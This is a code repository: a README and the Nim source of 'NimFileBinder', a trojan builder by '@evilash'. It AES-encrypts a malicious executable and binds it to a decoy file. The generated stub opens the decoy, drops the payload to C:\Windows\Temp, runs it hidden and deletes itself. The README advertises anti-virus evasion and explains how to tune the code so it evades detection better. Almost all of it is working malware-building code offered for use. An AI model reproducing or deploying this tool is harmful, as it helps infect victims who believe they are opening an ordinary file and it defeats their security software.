├── README.md
└── src
    └── NimFileBender.nim


/README.md:
--------------------------------------------------------------------------------
 1 | 
 2 | # NimFileBinder
 3 | ​	A Builder for Binding Evil File and Normal File with auto release
 4 | 
 5 | ​	written by Nim(Just a routh tool of learning Nim)
 6 | 
 7 | <img src="https://images-1258433570.cos.ap-beijing.myqcloud.com/images/20210807221105.png" alt="image-20210807221056924" style="zoom:67%;" />
 8 | 
 9 | ### Start
10 | 
11 | you should install the mingw , ex in Mac:
12 | 
13 | ```
14 | brew install mingw
15 | ```
16 | 
17 | ![image-20210807221034845](https://images-1258433570.cos.ap-beijing.myqcloud.com/images/20210807221036.png)
18 | 
19 | It will release your malicious files to C:\Windows\Temp\, and then self-delete and run normal files and malicious files
20 | 
21 | ### Feature
22 | 
23 | - Reduce the risk of being detected by anti-virus
24 | - “hardcode” the file into code with encrypt
25 | - self delete
26 | 
27 | ### Others
28 | 
29 | **1. There are still many imperfections in the code, which need to be modified when used:**
30 | 
31 | ​	Change the name of the output executable program, of course, you need to change the name of the automatic deletion:
32 | 
33 | ```
34 | ShellExecute(0, "open", "cmd.exe", "/c del *CustomFileName*", NULL, SW_HIDE)
35 | ```
36 | 
37 | ​	Of course you can also leave out this parameters,
38 | 
39 | ​	I am a lazy guy... sorry my bad :)
40 | 
41 | 
42 | 
43 | **2. In lines 116-117, the code I have commented, you can enable it and modify the corresponding name, which may be useful for evasion anti-virus** 
44 | 
45 | ```
46 | #copyFile("C:\\Windows\\Temp\\calc.txt", "C:\\Windows\\Temp\\calc.exe")
47 | #removeFile("C:\\Windows\\Temp\\calc.txt")
48 | ```
49 | 
50 | ​	Release a txt file first, then copy to PE
51 | 
52 | 


--------------------------------------------------------------------------------
/src/NimFileBender.nim:
--------------------------------------------------------------------------------
  1 | #author @evilash
  2 | 
  3 | import os
  4 | import base64
  5 | import strfmt
  6 | import osproc
  7 | import nimcrypto
  8 | import nimcrypto/sysrand
  9 | 
 10 | let help = """
 11 | 
 12 |   +-+-+-+-+-+-+-+-+-+-+-+-+-+
 13 |   |N i m F i l e B i n d e r|
 14 |   +-+-+-+-+-+-+-+-+-+-+-+-+-+ 
 15 |   @evilash
 16 | 
 17 |   It's a FileBinder writen by Nim
 18 |   And just a *rough* tool of learning Nim
 19 | 
 20 |   Usage:
 21 |     ./NimFileBinder <evil> <NormalFile> <key>
 22 |       -h,--help  : help
 23 | """
 24 | 
 25 | func toByteSeq*(str: string): seq[byte] {.inline.} =
 26 |   ## Converts a string to the corresponding byte sequence.
 27 |   @(str.toOpenArrayByte(0, str.high))
 28 | 
 29 | proc EncryptFile(File1, File2, key: string): void = 
 30 |   var
 31 |    Content1 = readFile(File1)
 32 |    Content2 = readFile(File2)
 33 |    EnContent1 = encode(Content1)
 34 |    EnContent2 = encode(Content2)
 35 | 
 36 |   var
 37 |     data: seq[byte] = toByteSeq(decode(EnContent1))
 38 |     envkey: string = key
 39 | 
 40 |     ectx, dctx: CTR[aes256]
 41 |     key: array[aes256.sizeKey, byte]
 42 |     iv: array[aes256.sizeBlock, byte]
 43 |     plaintext = newSeq[byte](len(data))
 44 |     enctext = newSeq[byte](len(data))
 45 |     b64iv: string
 46 | 
 47 | 
 48 | 
 49 |   # Create Random IV
 50 |   discard randomBytes(addr iv[0], 16)
 51 |   # We do not need to pad data, `CTR` mode works byte by byte.
 52 |   copyMem(addr plaintext[0], addr data[0], len(data))
 53 | 
 54 |   # Expand key to 32 bytes using SHA256 as the KDF
 55 |   var expandedkey = sha256.digest(envkey)
 56 |   copyMem(addr key[0], addr expandedkey.data[0], len(expandedkey.data))
 57 | 
 58 |   ectx.init(key, iv)
 59 |   ectx.encrypt(plaintext, enctext)
 60 |   ectx.clear()
 61 | 
 62 |   b64iv = encode(iv)
 63 | 
 64 |   var B64EnCryContent: string = encode(enctext)
 65 | 
 66 |   var BinderTemplete: string = """
 67 | 
 68 | import base64
 69 | import winim
 70 | import encodings
 71 | import nimcrypto
 72 | import nimcrypto/sysrand
 73 | 
 74 | func toByteSeq*(str: string): seq[byte] {} =
 75 |   ## Converts a string to the corresponding byte sequence.
 76 |   @(str.toOpenArrayByte(0, str.high))
 77 | 
 78 | var evilbase64 = "{}"
 79 | 
 80 | var data2: seq[byte] = toByteSeq(decode(evilbase64))
 81 | 
 82 | var BindFilebase64 = "{}"
 83 | 
 84 | var deb64iv = decode("{}")
 85 | var 
 86 |     envkey: string = "{}"
 87 |     dctx: CTR[aes256]
 88 |     key: array[aes256.sizeKey, byte]
 89 |     iv: array[aes256.sizeBlock, byte]
 90 |     crypttext = newSeq[byte]({})
 91 |     dectext = newSeq[byte]({})
 92 | 
 93 | copyMem(addr crypttext[0], addr data2[0], len(data2))
 94 | 
 95 | var expandedkey = sha256.digest(envkey)
 96 | copyMem(addr key[0], addr expandedkey.data[0], len(expandedkey.data))
 97 | copyMem(addr iv[0], addr deb64iv[0], aes256.sizeBlock)
 98 | 
 99 | dctx.init(key, iv)
100 | dctx.decrypt(crypttext, dectext)
101 | dctx.clear()
102 | 
103 | let decoded_Bindfile = decode(BindFilebase64)
104 | 
105 | var evilname: string = "{}"
106 | var Bindfilename: string = "{}"
107 | 
108 | writeFile(Bindfilename, decoded_Bindfile)   
109 | 
110 | var utf8evilname =convert(evilname,"GB2312","UTF-8")
111 | var utf8Bindfilename =convert(Bindfilename,"GB2312","UTF-8")
112 | 
113 | WinExec("cmd /k start " & utf8Bindfilename, SW_HIDE); 
114 | writeFile(r"C:\\Windows\\Temp\\" & utf8evilname, dectext) 
115 | 
116 | #copyFile("C:\\Windows\\Temp\\calc.txt", "C:\\Windows\\Temp\\calc.exe")
117 | #removeFile("C:\\Windows\\Temp\\calc.txt")
118 | 
119 | WinExec("cmd /c C:\\Windows\\Temp\\" & utf8evilname, SW_HIDE); 
120 | ShellExecute(0, "open", "cmd.exe", "/c del outfile.exe", NULL, SW_HIDE)
121 | #WinExec("cmd.exe /c del temp.exe", SW_HIDE)
122 | 
123 | """.fmt("{.inline.}", B64EnCryContent, EnContent2, b64iv, envkey, len(data), len(data), File1, File2)
124 | 
125 |   writeFile(r"outfile.nim", BinderTemplete)
126 | 
127 | 
128 | proc CompileFile(): void = 
129 |   let errC = execCmd("nim c --hints:off --cpu:amd64 -d:mingw --app:gui -d:danger -d:strip --opt:size --passc=-flto --passl=-flto {}".fmt("outfile.nim"))
130 |   var rmhandle = tryRemoveFile("outfile.nim")
131 | 
132 | 
133 | proc main() =
134 |   if paramCount() == 3:
135 |     var
136 |       TraojanFile: string = paramStr(1)
137 |       NormalFile: string = paramStr(2)
138 |       Enkey: string = paramStr(3)
139 | 
140 |     EncryptFile(TraojanFile, NormalFile, Enkey)
141 |     CompileFile()
142 |     return
143 | 
144 |   if paramCount() == 1 and (paramStr(1) == "-h" or paramStr(1) == "--help"):
145 |     echo help
146 |     return
147 |   
148 |   if paramCount() == 0:
149 |     echo help
150 |     return
151 | 
152 |   else:
153 |     echo "  Expect two arguments\n  ex: ./NimFileBinder <evil> <NormalFile> <key>"
154 |     return
155 |     
156 | 
157 | main()


--------------------------------------------------------------------------------